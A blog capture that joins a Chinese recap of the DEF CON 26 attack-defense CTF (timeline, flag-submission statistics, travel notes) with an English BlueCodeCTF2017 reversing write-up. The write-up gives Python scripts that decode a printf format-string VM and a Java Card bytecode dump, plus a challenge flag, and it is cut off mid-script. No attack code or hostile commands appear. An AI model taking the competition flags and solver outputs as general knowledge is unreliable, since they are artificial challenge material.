<h2 id="8月12日"><a href="#8月12日" class="headerlink" title="8月12日"></a>8月12日</h2><p>2点@zsxsoft用新算法修正了积分板<br>5点56找到了多依赖的root cause并修复。<br>9点半队长会,主办方宣布代码写错导致防御分数计算错误,已重新算分,今天poool一个tick可以提交一个patch,但是patch大概会用4分钟检查可用性<br>10点开赛,poool没开<br>10点42宣布patch系统回滚,所有的patch需要重新打<br>10点45 poool开题<br>10点47 主办方外网断了,这期间我尝试使用酒店WiFi和DEF CON会场WiFi跑Railgun和自动提交脚本并运行了多个实例保证不会因为网络问题导致漏掉flag<br>11点32现场网络再次故障<br>12点DEFKOR00T reeducation 一血<br>13点10 发现了vchat的hint,其实早上队长会说了,我英语不行没理解到<br>13点30主办方表示可以上去领酒喝<br>13点40主办方网络再次故障,44分恢复<br>14点比赛结束,今年没有final countdown,四点半ending ceremony<br>大家纷纷吐槽三天看了三道死题,累计浪费时间达到两位数,web题第二天毫无通知改环境,pointless从头到尾连不上等问题。<br>赛后和slipper还有Riatre聊天,slipper说poool和vchat是他出的,递茶poool在第二天晚上写出了type confusion的exp,这个漏洞我们直到比赛结束前10分钟才写出来。<br>后来大家过来合影,然后去看闭幕式,被DEFCON主办方以满员的理由引到楼下以后发现楼下闭路电视坏了,回到二楼跟看门人员交涉以后谢大哥一个人进去听了一会,后来大家都回到房间看直播。<br>18点24主办方通过twitter放出最后排名。</p>
<p><img src="/uploads/2018/09/ex_ORG_DSC01940.jpg"><br>现场运维合影</p>
<p><img src="/uploads/2018/09/ex_IMG_3735.jpg"><br>大合影</p>
<p><img src="/uploads/2018/09/ex_IMG_3764.jpg"></p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>这里先用手上的数据做个小结吧,<br>oooeditor accept了106个独立flag,总共有107个长度为48的独立flag<br><img src="/uploads/2018/09/def26_3.png"></p>
<p>bew accept了339个独立的flag,总共有346个长度为48的独立flag,其中第二天只accept了5个独立的flag。<br><img src="/uploads/2018/09/def26_4.png"></p>
<p>twoplustwo accept了61个独立的flag,总共有228个长度为48的独立flag(主要是主办方在题目下线以后还在往这个题目推flag)<br><img src="/uploads/2018/09/def26_5.png"></p>
<p>pointless从来没有用自动攻击打成功过<br>poool accept了529个独立flag,总共有542个长度为48的独立flag<br><img src="/uploads/2018/09/def26_6.png"></p>
<p>reeducation accept了432个独立flag,总共有433个长度为48的独立flag<br><img src="/uploads/2018/09/def26_7.png"></p>
<p>从主办方最后一天提供的记分板数据看</p>
<ul>
<li>serviceid=1 30 pointless</li>
<li>serviceid=3 328 bew</li>
<li>serviceid=4 116 oooeditor</li>
<li>serviceid=5 179 twoplustwo 178轮截止</li>
</ul>
<h2 id="前两天总分变化趋势"><a href="#前两天总分变化趋势" class="headerlink" title="前两天总分变化趋势"></a>前两天总分变化趋势</h2><p><img src="/uploads/2018/09/def26_8.png"><br><img src="/uploads/2018/09/def26_9.png"><br><img src="/uploads/2018/09/def26_10.png"><br><img src="/uploads/2018/09/def26_11.png"><br><img src="/uploads/2018/09/def26_12.png"></p>
<p>第二天攻防赛一开始到DEFKOR00T开始Poool打全场之前的队伍攻击数量曲线,可以明显的感受到推随机间隔时间推flag和pointless巨差的可用性对分数造成的影响,还有对不同的队伍可能存在的看脸概率能打成功的问题。这里大家后来赛后交流的时候都感觉shellphish是强行被避嫌,pointless这道题到最后大家应该都没怎么补、但是全场只有shellphish的这道题是可以被概率攻击成功的。<br><img src="/uploads/2018/09/def26_13.png"></p>
<p>第二天DEFKOR00T打全场到第二天结束的攻击队伍数量曲线,大概在221轮附近的时候发现了flag random accept的情况并及时调整了自动提交程序的代码。<br>看积分曲线感觉是DEFKOR00T先首先poool和bew两道题打了全场,但是我清楚的记得主办方当时宣布的是Bew一血是PwnThyBytes,于是回去仔细观察了下bew这个题有人做出来以后的计分板发现了个很有趣的事情,PwnThyBytes首先在217轮攻击了TokyoWestern,然后紧随其后koreanbadass和mhackeroni都在218轮攻击了PPP,然后这个时候DEFKOR00T Bew开始打全场,PwnThyBytes直到219轮才开Bew始打全场,我们Bew紧随其后在220轮开始打全场。<br><img src="/uploads/2018/09/def26_14.png"></p>
<p>以上,defcon26吐槽完毕。后面美西玩了5天,感谢AAA老司机全程开车,我全程在副驾一脸我想学开车.jpg。结束后第二天飞去SFO然后逛了旧金山,斯坦福,硅谷。刚下飞机就感受到了地中海气候的威力。在硅谷约了宋教授、h0twinter以及王老师keenjoy95,王老师请我们吃了川菜,感觉味道不错,然后宋教授带着我们逛了一圈Google以后就回到旧金山,沿一号公路一路向南逛了17里湾并在蒙特雷的餐馆巧遇陈少,错过了Big Sur以后游览了紫沙滩,一号公路ATT信号好都是骗人的,半程没信号,海象滩看了日落以后狂飙数百英里深夜赶到洛杉矶并在洛杉矶玩了两天,然后我周六早上的飞机LAX到YVR,在温哥华摸鱼一天弥补一下去年Pwn2Own没来得及玩温哥华的遗憾,非常感谢初中同学提供食宿并且全程带路。周日上午上了回上海的飞机。</p>
<p><img src="/uploads/2018/09/ex_IMG_3935.png"><br>美西摸鱼团路线</p>
<p><img src="/uploads/2018/09/ex_IMG_3768.jpg"><br>资深老司机</p>
<p><img src="/uploads/2018/09/ex_ORG_DSC02635.jpg"><br>在Google园区的合照</p>
<p><img src="/uploads/2018/09/ex_IMG_3915.jpg"><br>一号公路17里湾入口</p>
<p><img src="/uploads/2018/09/ex_IMG_3917.jpg"><br>海象滩日落</p>
<p>最后的最后再吐槽两句网鼎,改了个Polaris的离线版,两天比赛主要负责交flag和喊666,谢大哥🐂🍺。这么多人的攻防i春秋能运维成这样子凭良心讲还是不错的。</p>
<p>最后欢迎各位大佬指出文章中的错误和不足,谢谢大家耐心看我吐槽~</p>
2018-09-07T08:20:29.000Z
https://azure.kdays.cn/2017/11/13/BlueCodeCTF2017-writeup/
BlueCodeCTF2017 writeup
<h1 id="Reversing"><a href="#Reversing" class="headerlink" title="Reversing"></a>Reversing</h1><h2 id="fs-hell"><a href="#fs-hell" class="headerlink" title="fs hell"></a>fs hell</h2><p>printf format string brainfuck</p>
<p>using this script to trans the format string to pesudo c code.</p>
<span id="more"></span>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">prog = <span class="built_in">open</span>(<span class="string">'program.txt'</span>).read().split(<span class="string">'\n'</span>)</span><br><span class="line">r = <span class="built_in">dict</span>()</span><br><span class="line">w = <span class="built_in">dict</span>()</span><br><span class="line"></span><br><span class="line">w[<span class="number">6</span>] = <span class="string">'b'</span></span><br><span class="line">w[<span class="number">7</span>] = <span class="string">'c'</span></span><br><span class="line">w[<span class="number">8</span>] = <span class="string">'d'</span></span><br><span class="line">w[<span class="number">9</span>] = <span class="string">'e'</span></span><br><span class="line">w[<span class="number">10</span>]=<span class="string">'flag[e]'</span></span><br><span class="line">w[<span class="number">13</span>] =<span class="string">'cbInst'</span></span><br><span class="line"></span><br><span class="line">r[<span class="number">1</span>] = <span class="string">'b'</span></span><br><span class="line">r[<span class="number">2</span>] = <span class="string">'c'</span></span><br><span class="line">r[<span class="number">3</span>] = <span class="string">'d'</span></span><br><span class="line">r[<span class="number">4</span>] = <span class="string">'e'</span></span><br><span class="line">r[<span class="number">5</span>] = <span class="string">'flag[e]'</span></span><br><span class="line">r[<span class="number">1</span>] = <span class="string">'b'</span></span><br><span class="line">r[<span class="number">11</span>] = -<span class="number">1</span><span class="comment">#'.if b==0'</span></span><br><span class="line">r[<span class="number">12</span>] = -<span class="number">2</span><span class="comment">#'.if b<0'</span></span><br><span class="line">i = -<span class="number">1</span></span><br><span class="line"><span class="keyword">for</span> x <span class="keyword">in</span> prog:</span><br><span class="line"> i+=<span class="number">1</span></span><br><span class="line"> <span class="built_in">print</span> <span class="string">'label_%04X:'</span>%i,</span><br><span class="line"> <span class="keyword">if</span> x==<span class="string">''</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">''</span></span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">assert</span>(<span class="built_in">len</span>(x.split(<span class="string">'%'</span>))><span class="number">2</span>)</span><br><span class="line"> par = []</span><br><span class="line"> <span class="keyword">for</span> y <span class="keyword">in</span> x.split(<span class="string">"%"</span>):</span><br><span class="line"> <span class="keyword">if</span> y==<span class="string">''</span>: <span class="keyword">continue</span></span><br><span class="line"> <span class="comment">#print y,par</span></span><br><span class="line"> <span class="keyword">if</span> <span class="string">'*'</span> <span class="keyword">in</span> y:</span><br><span class="line"> par.append(r[<span class="built_in">int</span>(y[<span class="number">5</span>:-<span class="number">2</span>])])</span><br><span class="line"> <span class="keyword">elif</span> <span class="string">'n'</span> <span class="keyword">in</span> y:</span><br><span class="line"> addr = <span class="built_in">int</span>(y[:y.index(<span class="string">'$'</span>)])</span><br><span class="line"> <span class="keyword">if</span> addr==<span class="number">13</span>:</span><br><span class="line"> <span class="keyword">if</span> <span class="built_in">int</span>(par[<span class="number">0</span>])==-<span class="number">1</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"if(b==0) goto label_%04X;"</span>%(i+<span class="number">2</span>)</span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">int</span>(par[<span class="number">0</span>])==-<span class="number">2</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"if(b<0) goto label_%04X;"</span>%(i+<span class="number">2</span>)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"goto label_%04X;"</span>%((<span class="number">1</span>+i+<span class="built_in">int</span>(par[<span class="number">0</span>]))&<span class="number">0xffff</span>)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">if</span> <span class="string">'hhn'</span> <span class="keyword">in</span> y:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"*(unsigned char *)&%s=(%s)&0xff;"</span>%(w[addr],<span class="string">"+"</span>.join(par))</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">if</span> <span class="built_in">len</span>(par)><span class="number">1</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"*(unsigned short *)&%s=(%s)&0xffff;"</span>%(w[addr],<span class="string">"+"</span>.join(par))</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"*(unsigned short *)&%s=%s&0xffff;"</span>%(w[addr],<span class="string">"+"</span>.join(par))</span><br><span class="line"></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> par.append(y[y.index(<span class="string">'.'</span>)+<span class="number">1</span>:y.index(<span class="string">'d'</span>)])</span><br></pre></td></tr></table></figure>
<p>copy the initial parameter to the front and run solver</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">ror</span>(<span class="params">x,bits</span>):</span><br><span class="line"> <span class="keyword">return</span> ((x>>bits)|(x<<<span class="number">8</span>-bits))&<span class="number">0xff</span></span><br><span class="line">aa = flag[<span class="number">288</span>:<span class="number">288</span>+<span class="number">39</span>]</span><br><span class="line"><span class="keyword">assert</span>(<span class="built_in">len</span>(aa)==<span class="number">39</span>)</span><br><span class="line">bb = flag[<span class="number">512</span>:<span class="number">512</span>+<span class="number">256</span>]</span><br><span class="line"><span class="keyword">assert</span>(<span class="built_in">len</span>(bb)==<span class="number">256</span>)</span><br><span class="line">f = []</span><br><span class="line">y = <span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(aa)):</span><br><span class="line"> s = (bb[aa[i]]+bb[y])&<span class="number">0xff</span></span><br><span class="line"> <span class="built_in">print</span> <span class="built_in">hex</span>(s)</span><br><span class="line"> ch = <span class="number">0x100</span>-s</span><br><span class="line"> y=aa[i]</span><br><span class="line"> f.append(ror(ch,i%<span class="number">8</span>))</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span> f</span><br><span class="line"><span class="built_in">print</span> <span class="string">''</span>.join(<span class="built_in">map</span>(<span class="built_in">chr</span>,f))</span><br></pre></td></tr></table></figure>
<p>Finally get the flag <code>CBCTF{Do_Y0U_W4nt_MOR3_foRm4t_57RiNg5?}</code></p>
<h2 id="One-of-Three-Billion"><a href="#One-of-Three-Billion" class="headerlink" title="One of Three Billion"></a>One of Three Billion</h2><p>Memory fornesic, but related article we got from search engine is useless, because it does not provide a open source tools. First need to build a tools to parse Java card op code.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">parse</span>(<span class="params">data</span>):</span><br><span class="line"> d = <span class="built_in">dict</span>()</span><br><span class="line"> d[<span class="number">1032</span>] = <span class="string">'func1'</span></span><br><span class="line"> d[<span class="number">1025</span>] = <span class="string">'func2'</span></span><br><span class="line"> d[<span class="number">258</span>] = <span class="string">'func3'</span></span><br><span class="line"> d[<span class="number">260</span>] = <span class="string">'func4'</span></span><br><span class="line"> d[<span class="number">263</span>] = <span class="string">'func5'</span></span><br><span class="line"> d[<span class="number">521</span>] = <span class="string">'func6'</span></span><br><span class="line"> d[<span class="number">772</span>] = <span class="string">'func7'</span></span><br><span class="line"> f = <span class="built_in">dict</span>()</span><br><span class="line"> f[<span class="number">2160</span>] = <span class="string">'stfunc1'</span></span><br><span class="line"> f[<span class="number">2276</span>] = <span class="string">'read_word'</span></span><br><span class="line"> f[<span class="number">2278</span>] = <span class="string">'stfunc2'</span></span><br><span class="line"> i = <span class="number">0</span></span><br><span class="line"> <span class="keyword">while</span> i< <span class="built_in">len</span>(data):</span><br><span class="line"> op = data[i]</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%04X"</span>%i,</span><br><span class="line"> i = i + <span class="number">1</span></span><br><span class="line"> <span class="keyword">if</span> <span class="built_in">ord</span>(op) == <span class="number">0x70</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x %02x\t%s 0x%02x"</span> % (<span class="built_in">ord</span>(op), <span class="built_in">ord</span>(data[i]), <span class="string">"goto "</span>, <span class="number">2</span>+i+<span class="built_in">ord</span>(data[i]))</span><br><span class="line"> i = i + <span class="number">1</span></span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">ord</span>(op) == <span class="number">0x28</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x %02x\t%s %02x"</span> % (<span class="built_in">ord</span>(op), <span class="built_in">ord</span>(data[i]), <span class="string">"astore "</span>, <span class="built_in">ord</span>(data[i]))</span><br><span class="line"> i = i + <span class="number">1</span></span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">ord</span>(op) == <span class="number">0x1a</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x\t\t%s"</span> % (<span class="built_in">ord</span>(op), <span class="string">"aload_2 "</span>)</span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">ord</span>(op) == <span class="number">0x19</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x\t\t%s"</span> % (<span class="built_in">ord</span>(op), <span class="string">"aload_1 "</span>)</span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">ord</span>(op) == <span class="number">0x08</span>: </span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x\t\t%s"</span> % (<span class="built_in">ord</span>(op), <span class="string">"sconst_5 "</span>)</span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">ord</span>(op) == <span class="number">0x10</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x %02x\t%s %02x"</span> % (<span class="built_in">ord</span>(op), <span class="built_in">ord</span>(data[i]), <span class="string">"bspush "</span>, <span class="built_in">ord</span>(data[i]))</span><br><span class="line"> i = i + <span class="number">1</span></span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">ord</span>(op) == <span class="number">0x8b</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x %02x %02x\t%s %s"</span> % (<span class="built_in">ord</span>(op), <span class="built_in">ord</span>(data[i]), <span class="built_in">ord</span>(data[i+<span class="number">1</span>]), <span class="string">"invokevirtual "</span>, d[<span class="built_in">ord</span>(data[i])<<<span class="number">8</span>| <span class="built_in">ord</span>(data[i+<span class="number">1</span>])])</span><br><span class="line"> i = i + <span class="number">2</span></span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">ord</span>(op) == <span class="number">0xa8</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x %02x %02x\t%s 0x%02X"</span> % (<span class="built_in">ord</span>(op), <span class="built_in">ord</span>(data[i]), <span class="built_in">ord</span>(data[i+<span class="number">1</span>]), <span class="string">"goto_w "</span>, <span class="number">3</span>+i+(<span class="built_in">ord</span>(data[i])<<<span class="number">8</span>|<span class="built_in">ord</span>(data[i+<span class="number">1</span>])))</span><br><span class="line"> i = i + <span class="number">2</span></span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">ord</span>(op) == <span class="number">0x1f</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x\t\t%s"</span> % (<span class="built_in">ord</span>(op), <span class="string">"sload_3 "</span>)</span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">ord</span>(op) == <span class="number">0x6a</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x %02x\t%s 0x%02X"</span> % (<span class="built_in">ord</span>(op), <span class="built_in">ord</span>(data[i]), <span class="string">"if_scmpeq "</span>, <span class="number">2</span>+i+<span class="built_in">ord</span>(data[i]))</span><br><span class="line"> i = i + <span class="number">1</span></span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">ord</span>(op) == <span class="number">0x61</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x %02x\t%s 0x%02X"</span> % (<span class="built_in">ord</span>(op), <span class="built_in">ord</span>(data[i]), <span class="string">"if_ne "</span>, <span class="number">2</span>+i+<span class="built_in">ord</span>(data[i]))</span><br><span class="line"> i = i + <span class="number">1</span></span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">ord</span>(op) == <span class="number">0x29</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x %02x\t%s %02x"</span> % (<span class="built_in">ord</span>(op), <span class="built_in">ord</span>(data[i]), <span class="string">"sstore "</span>, <span class="built_in">ord</span>(data[i]))</span><br><span class="line"> i = i + <span class="number">1</span></span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">ord</span>(op) == <span class="number">0x16</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x %02x\t%s %02x"</span> % (<span class="built_in">ord</span>(op), <span class="built_in">ord</span>(data[i]), <span class="string">"sload "</span>, <span class="built_in">ord</span>(data[i]))</span><br><span class="line"> i = i + <span class="number">1</span></span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">ord</span>(op) == <span class="number">0x11</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x %02x %02x\t%s %d"</span> % (<span class="built_in">ord</span>(op), <span class="built_in">ord</span>(data[i]), <span class="built_in">ord</span>(data[i+<span class="number">1</span>]), <span class="string">"sspush "</span>, <span class="built_in">ord</span>(data[i])<<<span class="number">8</span>|<span class="built_in">ord</span>(data[i+<span class="number">1</span>]))</span><br><span class="line"> i = i + <span class="number">2</span></span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">ord</span>(op) == <span class="number">0x8d</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x %02x %02x\t%s %s"</span> % (<span class="built_in">ord</span>(op), <span class="built_in">ord</span>(data[i]), <span class="built_in">ord</span>(data[i+<span class="number">1</span>]), <span class="string">"invokestatic "</span>, f[<span class="built_in">ord</span>(data[i])<<<span class="number">8</span>| <span class="built_in">ord</span>(data[i+<span class="number">1</span>])])</span><br><span class="line"> i = i + <span class="number">2</span></span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">ord</span>(op) == <span class="number">0x7b</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x %02x %02x\t%s 0x%X"</span> % (<span class="built_in">ord</span>(op), <span class="built_in">ord</span>(data[i]), <span class="built_in">ord</span>(data[i+<span class="number">1</span>]), <span class="string">"getstatic_a "</span>, <span class="built_in">ord</span>(data[i])<<<span class="number">8</span>|<span class="built_in">ord</span>(data[i+<span class="number">1</span>]))</span><br><span class="line"> i = i + <span class="number">2</span></span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">ord</span>(op) == <span class="number">0x99</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x %02x %02x\t%s 0x%02X"</span> % (<span class="built_in">ord</span>(op), <span class="built_in">ord</span>(data[i]), <span class="built_in">ord</span>(data[i+<span class="number">1</span>]), <span class="string">"ifne_w "</span>, <span class="number">3</span>+i+(<span class="built_in">ord</span>(data[i])<<<span class="number">8</span>|<span class="built_in">ord</span>(data[i+<span class="number">1</span>])))</span><br><span class="line"> i = i + <span class="number">2</span></span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">ord</span>(op) == <span class="number">0x55</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x\t\t%s"</span> % (<span class="built_in">ord</span>(op), <span class="string">"sor "</span>)</span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">ord</span>(op) == <span class="number">0x41</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x\t\t%s"</span> % (<span class="built_in">ord</span>(op), <span class="string">"sadd "</span>)</span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">ord</span>(op) == <span class="number">0x57</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x\t\t%s"</span> % (<span class="built_in">ord</span>(op), <span class="string">"sxor "</span>)</span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">ord</span>(op) == <span class="number">0x4f</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x\t\t%s"</span> % (<span class="built_in">ord</span>(op), <span class="string">"sshr "</span>)</span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">ord</span>(op) == <span class="number">0x4d</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x\t\t%s"</span> % (<span class="built_in">ord</span>(op), <span class="string">"sshl "</span>)</span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">ord</span>(op) == <span class="number">0x43</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x\t\t%s"</span> % (<span class="built_in">ord</span>(op), <span class="string">"ssub "</span>)</span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">ord</span>(op) == <span class="number">0x45</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x\t\t%s"</span> % (<span class="built_in">ord</span>(op), <span class="string">"smul "</span>) </span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">ord</span>(op) == <span class="number">0x3</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x\t\t%s"</span> % (<span class="built_in">ord</span>(op), <span class="string">"sconst_0 "</span>) </span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">ord</span>(op) == <span class="number">0x4</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x\t\t%s"</span> % (<span class="built_in">ord</span>(op), <span class="string">"sconst_1 "</span>) </span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">ord</span>(op) == <span class="number">0x6</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x\t\t%s"</span> % (<span class="built_in">ord</span>(op), <span class="string">"sconst_3 "</span>) </span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">ord</span>(op) == <span class="number">0x3b</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x\t\t%s"</span> % (<span class="built_in">ord</span>(op), <span class="string">"pop "</span>)</span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">ord</span>(op) == <span class="number">0x7a</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%02x\t\t%s"</span> % (<span class="built_in">ord</span>(op), <span class="string">"return "</span>) </span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"unkonw: %02x"</span> % <span class="built_in">ord</span>(op)</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line">f = <span class="built_in">open</span>(<span class="string">'dump1.bin'</span>, <span class="string">'rb'</span>)</span><br><span class="line">ins = f.read()</span><br><span class="line">f.close()</span><br><span class="line"></span><br><span class="line">parse(ins[<span class="number">1</span>:<span class="number">0x151</span>])</span><br></pre></td></tr></table></figure>
<p>And then write a vm can run this code.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span 